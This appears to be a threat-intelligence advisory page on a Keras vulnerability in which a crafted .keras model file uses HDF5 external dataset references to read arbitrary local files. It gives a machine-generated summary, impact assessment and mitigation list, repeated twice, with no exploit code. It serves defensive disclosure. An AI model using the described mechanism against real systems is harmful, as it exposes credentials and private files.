CVE-2026-1669: CWE-73 External Control of File Name or Path in Google Keras
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
AI Analysis
Technical Summary
CVE-2026-1669 is a vulnerability classified under CWE-73 (External Control of File Name or Path) and CWE-200 (Information Exposure) affecting Google Keras versions 3.0.0 through 3.13.1. The issue lies in the model loading mechanism that integrates HDF5 external dataset references. Specifically, when a Keras model file (.keras) crafted with malicious HDF5 external dataset references is loaded, it can cause the software to read arbitrary files from the local filesystem. This arbitrary file read capability allows a remote attacker to disclose sensitive information without requiring authentication or elevated privileges. The attack vector involves tricking a user or system into loading a malicious model file, which then triggers the file read operation. The vulnerability impacts all supported platforms of Keras, making it broadly applicable. The CVSS 4.0 score of 7.1 reflects a high severity due to network attack vector, low attack complexity, no privileges required, but requiring user interaction. The vulnerability does not affect system availability or integrity directly but poses a significant confidentiality risk by exposing local files. No patches or exploit code are currently publicly available, and no known exploits in the wild have been reported. The vulnerability highlights a critical security gap in handling external references within machine learning model files, emphasizing the need for secure parsing and validation mechanisms in ML frameworks.
Potential Impact
The primary impact of CVE-2026-1669 is unauthorized disclosure of sensitive local files on systems running vulnerable Keras versions. This can lead to leakage of confidential data such as credentials, configuration files, or proprietary information, potentially facilitating further attacks like privilege escalation or lateral movement. Organizations relying on Keras for machine learning model deployment or development are at risk, especially if they accept or load model files from untrusted sources. The vulnerability does not directly affect system availability or integrity but compromises confidentiality significantly. Given Keras's widespread use in AI research, development, and production environments, the scope of affected systems is large. Attackers can exploit this vulnerability remotely over the network but require user interaction to load the malicious model file, which may limit automated exploitation but still poses a serious threat in environments where model files are shared or downloaded from external sources. The lack of current known exploits reduces immediate risk but does not diminish the urgency for mitigation. Exposure of sensitive files can have regulatory and reputational consequences for organizations, especially in sectors like finance, healthcare, and critical infrastructure where data confidentiality is paramount.
Mitigation Recommendations
1. Avoid loading Keras model files from untrusted or unauthenticated sources until patches are available. 2. Implement strict validation and sanitization of model files before loading, including checking for suspicious HDF5 external dataset references. 3. Use sandboxed or isolated environments for loading and testing new or untrusted model files to contain potential data exposure. 4. Monitor file access logs and system behavior for unusual read operations triggered by model loading processes. 5. Apply principle of least privilege to the environment running Keras to limit file system access scope. 6. Stay updated with Google Keras security advisories and apply patches promptly once released. 7. Consider using alternative model loading mechanisms or frameworks that do not support external HDF5 references if immediate patching is not feasible. 8. Educate developers and data scientists about the risks of loading untrusted model files and enforce secure handling policies. 9. Employ network-level controls to restrict access to systems running vulnerable Keras versions from untrusted networks. 10. Conduct regular security assessments of machine learning pipelines to identify and remediate similar risks.
Affected Countries
United States, China, Germany, Japan, South Korea, United Kingdom, France, Canada, India, Australia
CVE-2026-1669: CWE-73 External Control of File Name or Path in Google Keras
Description
Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2026-1669 is a vulnerability classified under CWE-73 (External Control of File Name or Path) and CWE-200 (Information Exposure) affecting Google Keras versions 3.0.0 through 3.13.1. The issue lies in the model loading mechanism that integrates HDF5 external dataset references. Specifically, when a Keras model file (.keras) crafted with malicious HDF5 external dataset references is loaded, it can cause the software to read arbitrary files from the local filesystem. This arbitrary file read capability allows a remote attacker to disclose sensitive information without requiring authentication or elevated privileges. The attack vector involves tricking a user or system into loading a malicious model file, which then triggers the file read operation. The vulnerability impacts all supported platforms of Keras, making it broadly applicable. The CVSS 4.0 score of 7.1 reflects a high severity due to network attack vector, low attack complexity, no privileges required, but requiring user interaction. The vulnerability does not affect system availability or integrity directly but poses a significant confidentiality risk by exposing local files. No patches or exploit code are currently publicly available, and no known exploits in the wild have been reported. The vulnerability highlights a critical security gap in handling external references within machine learning model files, emphasizing the need for secure parsing and validation mechanisms in ML frameworks.
Potential Impact
The primary impact of CVE-2026-1669 is unauthorized disclosure of sensitive local files on systems running vulnerable Keras versions. This can lead to leakage of confidential data such as credentials, configuration files, or proprietary information, potentially facilitating further attacks like privilege escalation or lateral movement. Organizations relying on Keras for machine learning model deployment or development are at risk, especially if they accept or load model files from untrusted sources. The vulnerability does not directly affect system availability or integrity but compromises confidentiality significantly. Given Keras's widespread use in AI research, development, and production environments, the scope of affected systems is large. Attackers can exploit this vulnerability remotely over the network but require user interaction to load the malicious model file, which may limit automated exploitation but still poses a serious threat in environments where model files are shared or downloaded from external sources. The lack of current known exploits reduces immediate risk but does not diminish the urgency for mitigation. Exposure of sensitive files can have regulatory and reputational consequences for organizations, especially in sectors like finance, healthcare, and critical infrastructure where data confidentiality is paramount.
Mitigation Recommendations
1. Avoid loading Keras model files from untrusted or unauthenticated sources until patches are available. 2. Implement strict validation and sanitization of model files before loading, including checking for suspicious HDF5 external dataset references. 3. Use sandboxed or isolated environments for loading and testing new or untrusted model files to contain potential data exposure. 4. Monitor file access logs and system behavior for unusual read operations triggered by model loading processes. 5. Apply principle of least privilege to the environment running Keras to limit file system access scope. 6. Stay updated with Google Keras security advisories and apply patches promptly once released. 7. Consider using alternative model loading mechanisms or frameworks that do not support external HDF5 references if immediate patching is not feasible. 8. Educate developers and data scientists about the risks of loading untrusted model files and enforce secure handling policies. 9. Employ network-level controls to restrict access to systems running vulnerable Keras versions from untrusted networks. 10. Conduct regular security assessments of machine learning pipelines to identify and remediate similar risks.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- Date Reserved
- 2026-01-29T22:48:03.030Z
- Cvss Version
- 4.0
- State
- PUBLISHED
Threat ID: 698d03334b57a58fa1d6e844
Added to database: 2/11/2026, 10:31:15 PM
Last enriched: 2/19/2026, 2:14:03 PM
Last updated: 3/29/2026, 4:24:42 AM
Views: 56
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.